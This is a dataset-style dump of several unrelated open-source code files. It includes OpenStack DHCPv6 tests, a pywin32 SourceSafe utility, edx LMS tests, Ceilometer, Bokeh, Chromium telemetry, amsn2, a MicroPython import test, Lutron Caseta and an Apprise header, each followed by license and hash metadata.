and there is no radvd, port shall receive IP address calculated
from its MAC and mask of subnet.
"""
for ra_mode, add_mode in (
(None, 'slaac'),
(None, 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
kwargs = {k: v for k, v in six.iteritems(kwargs) if v}
real_ip, eui_ip = self._get_ips_from_subnet(**kwargs)
self._clean_network()
self.assertEqual(eui_ip, real_ip,
('Real port IP %s shall be equal to EUI-64 %s'
'when ipv6_ra_mode=%s,ipv6_address_mode=%s') % (
real_ip, eui_ip,
ra_mode if ra_mode else "Off",
add_mode if add_mode else "Off"))
@test.idempotent_id('81f18ef6-95b5-4584-9966-10d480b7496a')
def test_dhcpv6_invalid_options(self):
"""Different configurations for radvd and dnsmasq are not allowed"""
for ra_mode, add_mode in (
('dhcpv6-stateless', 'dhcpv6-stateful'),
('dhcpv6-stateless', 'slaac'),
('slaac', 'dhcpv6-stateful'),
('dhcpv6-stateful', 'dhcpv6-stateless'),
('dhcpv6-stateful', 'slaac'),
('slaac', 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
self.assertRaises(lib_exc.BadRequest,
self.create_subnet,
self.network,
**kwargs)
@test.idempotent_id('21635b6f-165a-4d42-bf49-7d195e47342f')
def test_dhcpv6_stateless_no_ra_no_dhcp(self):
"""If no radvd option and no dnsmasq option is configured
port shall receive IP from fixed IPs list of subnet.
"""
real_ip, eui_ip = self._get_ips_from_subnet()
self._clean_network()
self.assertNotEqual(eui_ip, real_ip,
('Real port IP %s equal to EUI-64 %s when '
'ipv6_ra_mode=Off and ipv6_address_mode=Off,'
'but shall be taken from fixed IPs') % (
real_ip, eui_ip))
@test.idempotent_id('4544adf7-bb5f-4bdc-b769-b3e77026cef2')
def test_dhcpv6_two_subnets(self):
"""When one IPv6 subnet configured with dnsmasq SLAAC or DHCP stateless
and other IPv6 is with DHCP stateful, port shall receive EUI-64 IP
addresses from first subnet and DHCP address from second one.
Order of subnet creating should be unimportant.
"""
for order in ("slaac_first", "dhcp_first"):
for ra_mode, add_mode in (
('slaac', 'slaac'),
('dhcpv6-stateless', 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
kwargs_dhcp = {'ipv6_address_mode': 'dhcpv6-stateful'}
if order == "slaac_first":
subnet_slaac = self.create_subnet(self.network, **kwargs)
subnet_dhcp = self.create_subnet(
self.network, **kwargs_dhcp)
else:
subnet_dhcp = self.create_subnet(
self.network, **kwargs_dhcp)
subnet_slaac = self.create_subnet(self.network, **kwargs)
port_mac = data_utils.rand_mac_address()
eui_ip = data_utils.get_ipv6_addr_by_EUI64(
subnet_slaac['cidr'],
port_mac
).format()
port = self.create_port(self.network, mac_address=port_mac)
real_ips = dict([(k['subnet_id'], k['ip_address'])
for k in port['fixed_ips']])
real_dhcp_ip, real_eui_ip = [real_ips[sub['id']]
for sub in [subnet_dhcp,
subnet_slaac]]
self.client.delete_port(port['id'])
self.ports.pop()
body = self.client.list_ports()
ports_id_list = [i['id'] for i in body['ports']]
self.assertNotIn(port['id'], ports_id_list)
self._clean_network()
self.assertEqual(real_eui_ip,
eui_ip,
'Real IP is {0}, but shall be {1}'.format(
real_eui_ip,
eui_ip))
msg = ('Real IP address is {0} and it is NOT on '
'subnet {1}'.format(real_dhcp_ip, subnet_dhcp['cidr']))
self.assertIn(netaddr.IPAddress(real_dhcp_ip),
netaddr.IPNetwork(subnet_dhcp['cidr']), msg)
@test.idempotent_id('4256c61d-c538-41ea-9147-3c450c36669e')
def test_dhcpv6_64_subnets(self):
"""When one IPv6 subnet configured with dnsmasq SLAAC or DHCP stateless
and other IPv4 is with DHCP of IPv4, port shall receive EUI-64 IP
addresses from first subnet and IPv4 DHCP address from second one.
Order of subnet creating should be unimportant.
"""
for order in ("slaac_first", "dhcp_first"):
for ra_mode, add_mode in (
('slaac', 'slaac'),
('dhcpv6-stateless', 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
if order == "slaac_first":
subnet_slaac = self.create_subnet(self.network, **kwargs)
subnet_dhcp = self.create_subnet(
self.network, ip_version=4)
else:
subnet_dhcp = self.create_subnet(
self.network, ip_version=4)
subnet_slaac = self.create_subnet(self.network, **kwargs)
port_mac = data_utils.rand_mac_address()
eui_ip = data_utils.get_ipv6_addr_by_EUI64(
subnet_slaac['cidr'],
port_mac
).format()
port = self.create_port(self.network, mac_address=port_mac)
real_ips = dict([(k['subnet_id'], k['ip_address'])
for k in port['fixed_ips']])
real_dhcp_ip, real_eui_ip = [real_ips[sub['id']]
for sub in [subnet_dhcp,
subnet_slaac]]
self._clean_network()
self.assertEqual(real_eui_ip,
eui_ip,
'Real IP is {0}, but shall be {1}'.format(
real_eui_ip,
eui_ip))
msg = ('Real IP address is {0} and it is NOT on '
'subnet {1}'.format(real_dhcp_ip, subnet_dhcp['cidr']))
self.assertIn(netaddr.IPAddress(real_dhcp_ip),
netaddr.IPNetwork(subnet_dhcp['cidr']), msg)
@test.idempotent_id('4ab211a0-276f-4552-9070-51e27f58fecf')
def test_dhcp_stateful(self):
"""With all options below, DHCPv6 shall allocate address
from subnet pool to port.
"""
for ra_mode, add_mode in (
('dhcpv6-stateful', 'dhcpv6-stateful'),
('dhcpv6-stateful', None),
(None, 'dhcpv6-stateful'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
kwargs = {k: v for k, v in six.iteritems(kwargs) if v}
subnet = self.create_subnet(self.network, **kwargs)
port = self.create_port(self.network)
port_ip = next(iter(port['fixed_ips']), None)['ip_address']
self._clean_network()
msg = ('Real IP address is {0} and it is NOT on '
'subnet {1}'.format(port_ip, subnet['cidr']))
self.assertIn(netaddr.IPAddress(port_ip),
netaddr.IPNetwork(subnet['cidr']), msg)
@test.idempotent_id('51a5e97f-f02e-4e4e-9a17-a69811d300e3')
def test_dhcp_stateful_fixedips(self):
"""With all options below, port shall be able to get
requested IP from fixed IP range not depending on
DHCP stateful (not SLAAC!) settings configured.
"""
for ra_mode, add_mode in (
('dhcpv6-stateful', 'dhcpv6-stateful'),
('dhcpv6-stateful', None),
(None, 'dhcpv6-stateful'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
kwargs = {k: v for k, v in six.iteritems(kwargs) if v}
subnet = self.create_subnet(self.network, **kwargs)
ip_range = netaddr.IPRange(subnet["allocation_pools"][0]["start"],
subnet["allocation_pools"][0]["end"])
ip = netaddr.IPAddress(random.randrange(ip_range.first,
ip_range.last)).format()
port = self.create_port(self.network,
fixed_ips=[{'subnet_id': subnet['id'],
'ip_address': ip}])
port_ip = next(iter(port['fixed_ips']), None)['ip_address']
self._clean_network()
self.assertEqual(port_ip, ip,
("Port IP %s is not as fixed IP from "
"port create request: %s") % (
port_ip, ip))
@test.idempotent_id('98244d88-d990-4570-91d4-6b25d70d08af')
def test_dhcp_stateful_fixedips_outrange(self):
"""When port gets IP address from fixed IP range it
shall be checked if it's from subnets range.
"""
kwargs = {'ipv6_ra_mode': 'dhcpv6-stateful',
'ipv6_address_mode': 'dhcpv6-stateful'}
subnet = self.create_subnet(self.network, **kwargs)
ip_range = netaddr.IPRange(subnet["allocation_pools"][0]["start"],
subnet["allocation_pools"][0]["end"])
ip = netaddr.IPAddress(random.randrange(
ip_range.last + 1, ip_range.last + 10)).format()
self.assertRaises(lib_exc.BadRequest,
self.create_port,
self.network,
fixed_ips=[{'subnet_id': subnet['id'],
'ip_address': ip}])
@test.idempotent_id('57b8302b-cba9-4fbb-8835-9168df029051')
def test_dhcp_stateful_fixedips_duplicate(self):
"""When port gets IP address from fixed IP range it
shall be checked if it's not duplicate.
"""
kwargs = {'ipv6_ra_mode': 'dhcpv6-stateful',
'ipv6_address_mode': 'dhcpv6-stateful'}
subnet = self.create_subnet(self.network, **kwargs)
ip_range = netaddr.IPRange(subnet["allocation_pools"][0]["start"],
subnet["allocation_pools"][0]["end"])
ip = netaddr.IPAddress(random.randrange(
ip_range.first, ip_range.last)).format()
self.create_port(self.network,
fixed_ips=[
{'subnet_id': subnet['id'],
'ip_address': ip}])
self.assertRaisesRegexp(lib_exc.Conflict,
"object with that identifier already exists",
self.create_port,
self.network,
fixed_ips=[{'subnet_id': subnet['id'],
'ip_address': ip}])
def _create_subnet_router(self, kwargs):
subnet = self.create_subnet(self.network, **kwargs)
router = self.create_router(
router_name=data_utils.rand_name("routerv6-"),
admin_state_up=True)
port = self.create_router_interface(router['id'],
subnet['id'])
body = self.client.show_port(port['port_id'])
return subnet, body['port']
@test.idempotent_id('e98f65db-68f4-4330-9fea-abd8c5192d4d')
def test_dhcp_stateful_router(self):
"""With all options below the router interface shall
receive DHCPv6 IP address from allocation pool.
"""
for ra_mode, add_mode in (
('dhcpv6-stateful', 'dhcpv6-stateful'),
('dhcpv6-stateful', None),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
kwargs = {k: v for k, v in six.iteritems(kwargs) if v}
subnet, port = self._create_subnet_router(kwargs)
port_ip = next(iter(port['fixed_ips']), None)['ip_address']
self._clean_network()
self.assertEqual(port_ip, subnet['gateway_ip'],
("Port IP %s is not as first IP from "
"subnets allocation pool: %s") % (
port_ip, subnet['gateway_ip']))
def tearDown(self):
self._clean_network()
super(NetworksTestDHCPv6, self).tearDown()
| apache-2.0 | -4,462,429,140,617,705,500 | 46.384615 | 79 | 0.518074 | false |
huguesv/PTVS | Python/Product/Miniconda/Miniconda3-x64/Lib/site-packages/win32/scripts/VersionStamp/vssutil.py | 6 | 4694 | import win32con, string, traceback
import win32com.client, win32com.client.gencache
import pythoncom
import time
import os
constants = win32com.client.constants
win32com.client.gencache.EnsureModule('{783CD4E0-9D54-11CF-B8EE-00608CC9A71F}', 0, 5, 0)
error = "vssutil error"
def GetSS():
ss=win32com.client.Dispatch("SourceSafe")
# SS seems a bit wierd. It defaults the arguments as empty strings, but
# then complains when they are used - so we pass "Missing"
ss.Open(pythoncom.Missing, pythoncom.Missing, pythoncom.Missing)
return ss
def test(projectName):
ss=GetSS()
project = ss.VSSItem(projectName)
for item in project.GetVersions(constants.VSSFLAG_RECURSYES):
print(item.VSSItem.Name, item.VersionNumber, item.Action)
# item=i.Versions[0].VSSItem
# for h in i.Versions:
# print `h.Comment`, h.Action, h.VSSItem.Name
def SubstituteInString(inString, evalEnv):
substChar = "$"
fields = string.split(inString, substChar)
newFields = []
for i in range(len(fields)):
didSubst = 0
strVal = fields[i]
if i%2!=0:
try:
strVal = eval(strVal,evalEnv[0], evalEnv[1])
newFields.append(strVal)
didSubst = 1
except:
traceback.print_exc()
print("Could not substitute", strVal)
if not didSubst:
newFields.append(strVal)
return string.join(map(str, newFields), "")
def SubstituteInFile(inName, outName, evalEnv):
inFile = open(inName, "r")
try:
outFile = open(outName, "w")
try:
while 1:
line = inFile.read()
if not line: break
outFile.write(SubstituteInString(line, evalEnv))
finally:
outFile.close()
finally:
inFile.close()
def VssLog(project, linePrefix = "", noLabels = 5, maxItems=150):
lines = []
num = 0
labelNum = 0
for i in project.GetVersions(constants.VSSFLAG_RECURSYES):
num = num + 1
if num > maxItems : break
commentDesc = itemDesc = ""
if i.Action[:5]=="Added":
continue
if len(i.Label):
labelNum = labelNum + 1
itemDesc = i.Action
else:
itemDesc = i.VSSItem.Name
if str(itemDesc[-4:])==".dsp":
continue
if i.Comment:
commentDesc ="\n%s\t%s" % (linePrefix, i.Comment)
lines.append("%s%s\t%s%s" % (linePrefix, time.asctime(time.localtime(int(i.Date))), itemDesc, commentDesc))
if labelNum > noLabels:
break
return string.join(lines,"\n")
def SubstituteVSSInFile(projectName, inName, outName):
import win32api
if win32api.GetFullPathName(inName)==win32api.GetFullPathName(outName):
raise RuntimeError("The input and output filenames can not be the same")
sourceSafe=GetSS()
project = sourceSafe.VSSItem(projectName)
# Find the last label
label = None
for version in project.Versions:
if version.Label:
break
else:
print("Couldnt find a label in the sourcesafe project!")
return
# Setup some local helpers for the conversion strings.
vss_label = version.Label
vss_date = time.asctime(time.localtime(int(version.Date)))
now = time.asctime(time.localtime(time.time()))
SubstituteInFile(inName, outName, (locals(),globals()))
def CountCheckouts(item):
num = 0
if item.Type==constants.VSSITEM_PROJECT:
for sub in item.Items:
num = num + CountCheckouts(sub)
else:
if item.IsCheckedOut:
num = num + 1
return num
def GetLastBuildNo(project):
i = GetSS().VSSItem(project)
# Find the last label
lab = None
for version in i.Versions:
lab = str(version.Label)
if lab: return lab
return None
def MakeNewBuildNo(project, buildDesc = None, auto=0, bRebrand = 0):
if buildDesc is None: buildDesc = "Created by Python"
ss = GetSS()
i = ss.VSSItem(project)
num = CountCheckouts(i)
if num > 0:
msg = "This project has %d items checked out\r\n\r\nDo you still want to continue?" % num
import win32ui
if win32ui.MessageBox(msg, project, win32con.MB_YESNO) != win32con.IDYES:
return
oldBuild = buildNo = GetLastBuildNo(project)
if buildNo is None:
buildNo = "1"
oldBuild = "<None>"
else:
try:
buildNo = string.atoi(buildNo)
if not bRebrand: buildNo = buildNo + 1
buildNo = str(buildNo)
except ValueError:
raise error("The previous label could not be incremented: %s" % (oldBuild))
if not auto:
from pywin.mfc import dialog
buildNo = dialog.GetSimpleInput("Enter new build number", buildNo, "%s - Prev: %s" % (project, oldBuild))
if buildNo is None: return
i.Label(buildNo, "Build %s: %s" % (buildNo,buildDesc))
if auto:
print("Branded project %s with label %s" % (project, buildNo))
return buildNo
if __name__=='__main__':
# UpdateWiseExeName("PyWiseTest.wse", "PyWiseTest-10.exe")
# MakeVersion()
# test(tp)
# MakeNewBuildNo(tp)
tp = "\\Python\\Python Win32 Extensions"
SubstituteVSSInFile(tp, "d:\\src\\pythonex\\win32\\win32.txt", "d:\\temp\\win32.txt")
| apache-2.0 | -1,498,354,072,023,844,600 | 26.611765 | 109 | 0.702599 | false |
edx/edx-enterprise | tests/test_integrated_channels/test_lms_utils.py | 1 | 2824 | # -*- coding: utf-8 -*-
"""
Tests for the lms_utils used by integration channels.
"""
import unittest
import mock
import pytest
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from integrated_channels.lms_utils import get_course_certificate, get_course_details, get_single_user_grade
from test_utils import factories
A_GOOD_COURSE_ID = "edX/DemoX/Demo_Course"
A_BAD_COURSE_ID = "this_shall_not_pass"
A_LMS_USER = "a_lms_user"
@pytest.mark.django_db
class TestLMSUtils(unittest.TestCase):
"""
Tests for lms_utils
"""
def setUp(self):
self.username = A_LMS_USER
self.user = factories.UserFactory(username=self.username)
super().setUp()
@mock.patch('integrated_channels.lms_utils.get_certificate_for_user')
def test_get_course_certificate_success(self, mock_get_course_certificate):
a_cert = {
"username": A_LMS_USER,
"grade": "0.98",
}
mock_get_course_certificate.return_value = a_cert
cert = get_course_certificate(A_GOOD_COURSE_ID, self.user)
assert cert == a_cert
assert mock_get_course_certificate.call_count == 1
@mock.patch('integrated_channels.lms_utils.get_certificate_for_user')
def test_get_course_certificate_bad_course_id_throws(self, mock_get_course_certificate):
with pytest.raises(InvalidKeyError):
get_course_certificate(A_BAD_COURSE_ID, self.user)
assert mock_get_course_certificate.call_count == 0
@mock.patch('integrated_channels.lms_utils.CourseGradeFactory')
def test_get_single_user_grade_success(self, mock_course_grade_factory):
expected_grade = "0.8"
mock_course_grade_factory.return_value.read.return_value = expected_grade
single_user_grade = get_single_user_grade(A_GOOD_COURSE_ID, self.user)
assert single_user_grade == expected_grade
mock_course_grade_factory.return_value.read.assert_called_with(
self.user,
course_key=CourseKey.from_string(A_GOOD_COURSE_ID)
)
@mock.patch('integrated_channels.lms_utils.CourseGradeFactory')
def test_get_single_user_grade_bad_course_id_throws(self, mock_course_grade_factory):
with pytest.raises(InvalidKeyError):
get_single_user_grade(A_BAD_COURSE_ID, self.user)
assert mock_course_grade_factory.call_count == 0
@mock.patch('integrated_channels.lms_utils.CourseOverview')
def test_get_course_details_success(self, mock_course_overview):
course_overview = {'field': 'value'}
mock_get_from_id = mock_course_overview.get_from_id
mock_get_from_id.return_value = course_overview
result_course_overview = get_course_details(A_GOOD_COURSE_ID)
assert result_course_overview == course_overview
| agpl-3.0 | -3,214,498,446,191,658,000 | 38.222222 | 107 | 0.684844 | false |
m1093782566/openstack_org_ceilometer | ceilometer/compute/notifications/__init__.py | 6 | 1335 | #
# Copyright 2013 Intel
#
# Author: Shuangtai Tian <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
import oslo.messaging
from ceilometer import plugin
OPTS = [
cfg.StrOpt('nova_control_exchange',
default='nova',
help="Exchange name for Nova notifications."),
]
cfg.CONF.register_opts(OPTS)
class ComputeNotificationBase(plugin.NotificationBase):
@staticmethod
def get_targets(conf):
"""Return a sequence of oslo.messaging.Target
This sequence is defining the exchange and topics to be connected for
this plugin.
"""
return [oslo.messaging.Target(topic=topic,
exchange=conf.nova_control_exchange)
for topic in conf.notification_topics]
| apache-2.0 | -5,234,107,409,743,114,000 | 29.340909 | 77 | 0.692884 | false |
timsnyder/bokeh | bokeh/colors/color.py | 2 | 4822 | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Provide a base class for representing color values.
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'Color',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class Color(object):
''' A base class for representing color objects.
'''
def __repr__(self):
return self.to_css()
@staticmethod
def clamp(value, maximum=None):
''' Clamp numeric values to be non-negative, an optionally, less than a
given maximum.
Args:
value (float) :
A number to clamp.
maximum (float, optional) :
A max bound to to clamp to. If None, there is no upper bound,
and values are only clamped to be non-negative. (default: None)
Returns:
float
'''
value = max(value, 0)
if maximum is not None:
return min(value, maximum)
else:
return value
def copy(self):
''' Copy this color.
*Subclasses must implement this method.*
'''
raise NotImplementedError
def darken(self, amount):
''' Darken (reduce the luminance) of this color.
Args:
amount (float) :
Amount to reduce the luminance by (clamped above zero)
Returns:
Color
'''
hsl = self.to_hsl()
hsl.l = self.clamp(hsl.l - amount)
return self.from_hsl(hsl)
@classmethod
def from_hsl(cls, value):
''' Create a new color by converting from an HSL color.
*Subclasses must implement this method.*
Args:
value (HSL) :
A color to convert from HSL
Returns:
Color
'''
raise NotImplementedError
@classmethod
def from_rgb(cls, value):
''' Create a new color by converting from an RGB color.
*Subclasses must implement this method.*
Args:
value (:class:`~bokeh.colors.rgb.RGB`) :
A color to convert from RGB
Returns:
Color
'''
raise NotImplementedError
def lighten(self, amount):
''' Lighten (increase the luminance) of this color.
Args:
amount (float) :
Amount to increase the luminance by (clamped above zero)
Returns:
Color
'''
hsl = self.to_hsl()
hsl.l = self.clamp(hsl.l + amount, 1)
return self.from_hsl(hsl)
def to_css(self):
''' Return a CSS representation of this color.
*Subclasses must implement this method.*
Returns:
str
'''
raise NotImplementedError
def to_hsl(self):
''' Create a new HSL color by converting from this color.
*Subclasses must implement this method.*
Returns:
HSL
'''
raise NotImplementedError
def to_rgb(self):
''' Create a new HSL color by converting from this color.
*Subclasses must implement this method.*
Returns:
:class:`~bokeh.colors.rgb.RGB`
'''
raise NotImplementedError
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| bsd-3-clause | 6,358,433,311,000,688,000 | 24.648936 | 82 | 0.412692 | false |
Epirex/android_external_chromium_org | tools/telemetry/telemetry/page/html_page_measurement_results_unittest.py | 23 | 7625 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import StringIO
import unittest
from telemetry.page import html_page_measurement_results
from telemetry.page import page_set
def _MakePageSet():
return page_set.PageSet.FromDict({
"description": "hello",
"archive_path": "foo.wpr",
"pages": [
{"url": "http://www.foo.com/"},
{"url": "http://www.bar.com/"},
{"url": "http://www.baz.com/"}
]
}, os.path.dirname(__file__))
class DeterministicHtmlPageMeasurementResults(
html_page_measurement_results.HtmlPageMeasurementResults):
def _GetBuildTime(self):
return 'build_time'
def _GetRevision(self):
return 'revision'
# Wrap string IO with a .name property so that it behaves more like a file.
class StringIOFile(StringIO.StringIO):
name = 'fake_output_file'
class HtmlPageMeasurementResultsTest(unittest.TestCase):
# TODO(tonyg): Remove this backfill when we can assume python 2.7 everywhere.
def assertIn(self, first, second, _=None):
self.assertTrue(first in second,
msg="'%s' not found in '%s'" % (first, second))
def test_basic_summary(self):
test_page_set = _MakePageSet()
output_file = StringIOFile()
# Run the first time and verify the results are written to the HTML file.
results = DeterministicHtmlPageMeasurementResults(
output_file, 'test_name', False, False, 'browser_type')
results.WillMeasurePage(test_page_set.pages[0])
results.Add('a', 'seconds', 3)
results.DidMeasurePage()
results.AddSuccess(test_page_set.pages[0])
results.WillMeasurePage(test_page_set.pages[1])
results.Add('a', 'seconds', 7)
results.DidMeasurePage()
results.AddSuccess(test_page_set.pages[1])
results.PrintSummary()
results.GetResults()
expected = {
"platform": "browser_type",
"buildTime": "build_time",
"label": None,
"tests": {
"test_name": {
"metrics": {
"a": {
"current": [3, 7],
"units": "seconds",
"important": True
},
"telemetry_page_measurement_results.num_failed": {
"current": [0],
"units": "count",
"important": False
},
"a_by_url.http://www.bar.com/": {
"current": [7],
"units": "seconds",
"important": False
},
"telemetry_page_measurement_results.num_errored": {
"current": [0],
"units": "count",
"important": False
},
"a_by_url.http://www.foo.com/": {
"current": [3],
"units": "seconds",
"important": False
}
}
}
},
"revision": "revision"
}
self.assertEquals(expected, results.GetResults())
# Run the second time and verify the results are appended to the HTML file.
output_file.seek(0)
results = DeterministicHtmlPageMeasurementResults(
output_file, 'test_name', False, False, 'browser_type')
results.WillMeasurePage(test_page_set.pages[0])
results.Add('a', 'seconds', 4)
results.DidMeasurePage()
results.AddSuccess(test_page_set.pages[0])
results.WillMeasurePage(test_page_set.pages[1])
results.Add('a', 'seconds', 8)
results.DidMeasurePage()
results.AddSuccess(test_page_set.pages[1])
results.PrintSummary()
expected = [
{
"platform": "browser_type",
"buildTime": "build_time",
"label": None,
"tests": {
"test_name": {
"metrics": {
"a": {
"current": [3, 7],
"units": "seconds",
"important": True
},
"telemetry_page_measurement_results.num_failed": {
"current": [0],
"units": "count",
"important": False
},
"a_by_url.http://www.bar.com/": {
"current": [7],
"units": "seconds",
"important": False
},
"telemetry_page_measurement_results.num_errored": {
"current": [0],
"units": "count",
"important": False
},
"a_by_url.http://www.foo.com/": {
"current": [3],
"units": "seconds",
"important": False
}
}
}
},
"revision": "revision"
},
{
"platform": "browser_type",
"buildTime": "build_time",
"label": None,
"tests": {
"test_name": {
"metrics": {
"a": {
"current": [4, 8],
"units": "seconds",
"important": True
},
"telemetry_page_measurement_results.num_failed": {
"current": [0],
"units": "count",
"important": False,
},
"a_by_url.http://www.bar.com/": {
"current": [8],
"units": "seconds",
"important": False
},
"telemetry_page_measurement_results.num_errored": {
"current": [0],
"units": "count",
"important": False
},
"a_by_url.http://www.foo.com/": {
"current": [4],
"units": "seconds",
"important": False
}
}
}
},
"revision": "revision"
}]
self.assertEquals(expected, results.GetCombinedResults())
last_output_len = len(output_file.getvalue())
# Now reset the results and verify the old ones are gone.
output_file.seek(0)
results = DeterministicHtmlPageMeasurementResults(
output_file, 'test_name', True, False, 'browser_type')
results.WillMeasurePage(test_page_set.pages[0])
results.Add('a', 'seconds', 5)
results.DidMeasurePage()
results.AddSuccess(test_page_set.pages[0])
results.WillMeasurePage(test_page_set.pages[1])
results.Add('a', 'seconds', 9)
results.DidMeasurePage()
results.AddSuccess(test_page_set.pages[1])
results.PrintSummary()
expected = [{
"platform": "browser_type",
"buildTime": "build_time",
"label": None,
"tests": {
"test_name": {
"metrics": {
"a": {
"current": [5, 9],
"units": "seconds",
"important": True
},
"telemetry_page_measurement_results.num_failed": {
"current": [0],
"units": "count",
"important": False
},
"a_by_url.http://www.bar.com/": {
"current": [9],
"units": "seconds",
"important": False
},
"telemetry_page_measurement_results.num_errored": {
"current": [0],
"units": "count",
"important": False
},
"a_by_url.http://www.foo.com/": {
"current": [5],
"units": "seconds",
"important": False
}
}
}
},
"revision": "revision"
}]
self.assertEquals(expected, results.GetCombinedResults())
self.assertTrue(len(output_file.getvalue()) < last_output_len)
| bsd-3-clause | 7,517,208,105,708,663,000 | 29.62249 | 79 | 0.502164 | false |
amsn/amsn2 | amsn2/ui/front_ends/cocoa/image.py | 2 | 1362 |
from AppKit import *
from amsn2.ui import base
class Image(object):
""" This interface will represent an image to be used by the UI"""
def __init__(self, amsn_core, parent):
"""Initialize the interface. You should store the reference to the core in here """
self._img = NSImage.alloc().initWithSize_((1,1))
def load(self, resource_name, value):
""" This method is used to load an image using the name of a resource and a value for that resource
resource_name can be :
- 'File', value is the filename
- 'Skin', value is the skin key
- some more :)
"""
self._img.release()
if (resource_name == 'File'):
self._img = NSImage.alloc().initWithContentsOfFile_(str(value))
def append(self, resource_name, value):
""" This method is used to overlap an image on the current image
Have a look at the documentation of the 'load' method for the meanings of 'resource_name' and 'value'
"""
raise NotImplementedError
def prepend(self, resource_name, value):
""" This method is used to underlap an image under the current image
Have a look at the documentation of the 'load' method for the meanings of 'resource_name' and 'value'
"""
raise NotImplementedError
| gpl-2.0 | 3,850,015,471,914,863,600 | 40.272727 | 113 | 0.618209 | false |
kerneltask/micropython | tests/micropython/import_mpy_invalid.py | 2 | 1511 | # test importing of invalid .mpy files
try:
import sys, uio, uos
uio.IOBase
uos.mount
except (ImportError, AttributeError):
print("SKIP")
raise SystemExit
class UserFile(uio.IOBase):
def __init__(self, data):
self.data = memoryview(data)
self.pos = 0
def readinto(self, buf):
n = min(len(buf), len(self.data) - self.pos)
buf[:n] = self.data[self.pos : self.pos + n]
self.pos += n
return n
def ioctl(self, req, arg):
return 0
class UserFS:
def __init__(self, files):
self.files = files
def mount(self, readonly, mksfs):
pass
def umount(self):
pass
def stat(self, path):
if path in self.files:
return (32768, 0, 0, 0, 0, 0, 0, 0, 0, 0)
raise OSError
def open(self, path, mode):
return UserFile(self.files[path])
# these are the test .mpy files
user_files = {
"/mod0.mpy": b"", # empty file
"/mod1.mpy": b"M", # too short header
"/mod2.mpy": b"M\x00\x00\x00", # bad version
"/mod3.mpy": b"M\x00\x00\x00\x7f", # qstr window too large
}
# create and mount a user filesystem
uos.mount(UserFS(user_files), "/userfs")
sys.path.append("/userfs")
# import .mpy files from the user filesystem
for i in range(len(user_files)):
mod = "mod%u" % i
try:
__import__(mod)
except ValueError as er:
print(mod, "ValueError", er)
# unmount and undo path addition
uos.umount("/userfs")
sys.path.pop()
| mit | -3,037,296,073,319,553,500 | 20.898551 | 63 | 0.583719 | false |
sdague/home-assistant | homeassistant/components/lutron_caseta/switch.py | 7 | 1494 | """Support for Lutron Caseta switches."""
import logging
from homeassistant.components.switch import DOMAIN, SwitchEntity
from . import DOMAIN as CASETA_DOMAIN, LutronCasetaDevice
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Lutron Caseta switch platform.
Adds switches from the Caseta bridge associated with the config_entry as
switch entities.
"""
entities = []
bridge = hass.data[CASETA_DOMAIN][config_entry.entry_id]
switch_devices = bridge.get_devices_by_domain(DOMAIN)
for switch_device in switch_devices:
entity = LutronCasetaLight(switch_device, bridge)
entities.append(entity)
async_add_entities(entities, True)
return True
class LutronCasetaLight(LutronCasetaDevice, SwitchEntity):
"""Representation of a Lutron Caseta switch."""
async def async_turn_on(self, **kwargs):
"""Turn the switch on."""
await self._smartbridge.turn_on(self.device_id)
async def async_turn_off(self, **kwargs):
"""Turn the switch off."""
await self._smartbridge.turn_off(self.device_id)
@property
def is_on(self):
"""Return true if device is on."""
return self._device["current_state"] > 0
async def async_update(self):
"""Update when forcing a refresh of the device."""
self._device = self._smartbridge.get_device_by_id(self.device_id)
_LOGGER.debug(self._device)
| apache-2.0 | 3,226,165,471,130,838,000 | 29.489796 | 76 | 0.679384 | false |
JackDandy/SickGear | lib/apprise/plugins/NotifyDiscord.py | 2 | 17395 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2019 Chris Caron <[email protected]>
# All rights reserved.
#
# This code is licensed under the MIT License.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
